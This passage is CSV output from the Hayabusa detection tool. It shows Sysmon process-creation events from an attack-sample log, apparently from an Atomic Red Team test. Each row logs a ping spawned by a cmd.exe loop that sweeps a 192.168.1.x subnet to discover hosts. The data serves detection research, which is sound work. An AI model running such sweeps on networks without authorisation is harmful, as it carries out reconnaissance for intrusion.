Created,"Cmd: ping -n 1 -w 100 192.168.1.55 | Process: C:\Windows\System32\PING.EXE | User: 
MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1256 | PGUID: 747F3D96-D912-5D31-0000-001072B03400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:02.565 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.56 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5656 | PGUID: 747F3D96-D912-5D31-0000-00105CB33400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:03.059 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.57 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4792 | PGUID: 747F3D96-D913-5D31-0000-00105AB63400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:03.520 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.58 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5676 | PGUID: 747F3D96-D913-5D31-0000-001044B93400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:04.024 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.59 | Process: 
C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5968 | PGUID: 747F3D96-D914-5D31-0000-001030BC3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:04.522 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.60 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 7156 | PGUID: 747F3D96-D914-5D31-0000-00102DBF3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:05.036 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.61 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4172 | PGUID: 747F3D96-D915-5D31-0000-001017C23400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:05.516 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.62 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1628 | PGUID: 747F3D96-D915-5D31-0000-001002C53400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:06.019 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 
100 192.168.1.63 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 680 | PGUID: 747F3D96-D916-5D31-0000-0010ECC73400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:06.440 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.64 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6600 | PGUID: 747F3D96-D916-5D31-0000-0010B1D03400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:07.053 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.65 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5468 | PGUID: 747F3D96-D917-5D31-0000-00109BD33400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:07.413 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.66 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4052 | PGUID: 747F3D96-D917-5D31-0000-001085D63400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:08.043 +09:00,MSEDGEWIN10,1,info,,Process 
Created,"Cmd: ping -n 1 -w 100 192.168.1.67 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6220 | PGUID: 747F3D96-D918-5D31-0000-00106FD93400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:08.500 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.68 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5348 | PGUID: 747F3D96-D918-5D31-0000-001059DC3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:09.012 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.69 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 976 | PGUID: 747F3D96-D919-5D31-0000-00109EDF3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:09.474 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.70 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 396 | PGUID: 747F3D96-D919-5D31-0000-001088E23400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:10.014 
+09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.71 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1200 | PGUID: 747F3D96-D91A-5D31-0000-001072E53400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:10.522 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.72 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4664 | PGUID: 747F3D96-D91A-5D31-0000-00105CE83400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:11.031 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.73 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2804 | PGUID: 747F3D96-D91B-5D31-0000-001046EB3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:11.504 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.74 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2180 | PGUID: 
747F3D96-D91B-5D31-0000-00100BF43400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:12.023 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.75 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6080 | PGUID: 747F3D96-D91C-5D31-0000-0010F5F63400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:12.547 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.76 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6308 | PGUID: 747F3D96-D91C-5D31-0000-0010DFF93400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:13.030 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.77 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5692 | PGUID: 747F3D96-D91D-5D31-0000-0010CAFC3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:13.489 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.78 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 
0x50951 | PID: 4092 | PGUID: 747F3D96-D91D-5D31-0000-0010B7FF3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:14.036 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.79 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6516 | PGUID: 747F3D96-D91E-5D31-0000-0010A1023500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:14.552 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.80 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1232 | PGUID: 747F3D96-D91E-5D31-0000-00108E053500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:15.051 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.81 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3164 | PGUID: 747F3D96-D91F-5D31-0000-001079083500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:15.548 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.82 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 
-w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5612 | PGUID: 747F3D96-D91F-5D31-0000-0010640B3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:16.040 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.83 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2288 | PGUID: 747F3D96-D920-5D31-0000-00104E0E3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:16.584 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.84 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1684 | PGUID: 747F3D96-D920-5D31-0000-0010A6183500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:17.041 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.85 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1060 | PGUID: 747F3D96-D921-5D31-0000-0010921B3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:17.511 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.86 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l 
%i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3744 | PGUID: 747F3D96-D921-5D31-0000-00107C1E3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:18.015 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.87 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3068 | PGUID: 747F3D96-D922-5D31-0000-001066213500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:18.509 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.88 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6312 | PGUID: 747F3D96-D922-5D31-0000-001063243500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:18.990 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.89 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3116 | PGUID: 747F3D96-D922-5D31-0000-001053273500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:19.541 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.90 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: 
""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3868 | PGUID: 747F3D96-D923-5D31-0000-00103D2A3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:20.006 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.91 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1020 | PGUID: 747F3D96-D924-5D31-0000-0010272D3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:20.543 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.92 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2292 | PGUID: 747F3D96-D924-5D31-0000-001024303500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:21.036 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.93 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3612 | PGUID: 747F3D96-D925-5D31-0000-00106C3C3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:21.488 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.94 | Process: C:\Windows\System32\PING.EXE | User: 
MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5852 | PGUID: 747F3D96-D925-5D31-0000-0010563F3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:22.030 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.95 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6288 | PGUID: 747F3D96-D926-5D31-0000-00101B483500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:22.542 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.96 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3736 | PGUID: 747F3D96-D926-5D31-0000-0010074B3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:23.037 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.97 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1720 | PGUID: 747F3D96-D927-5D31-0000-0010F24D3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:23.534 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.98 | Process: 
C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 752 | PGUID: 747F3D96-D927-5D31-0000-0010DC503500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:24.026 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.99 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3680 | PGUID: 747F3D96-D928-5D31-0000-0010C7533500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:24.521 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.100 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1880 | PGUID: 747F3D96-D928-5D31-0000-0010B1563500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:25.035 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.101 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 7152 | PGUID: 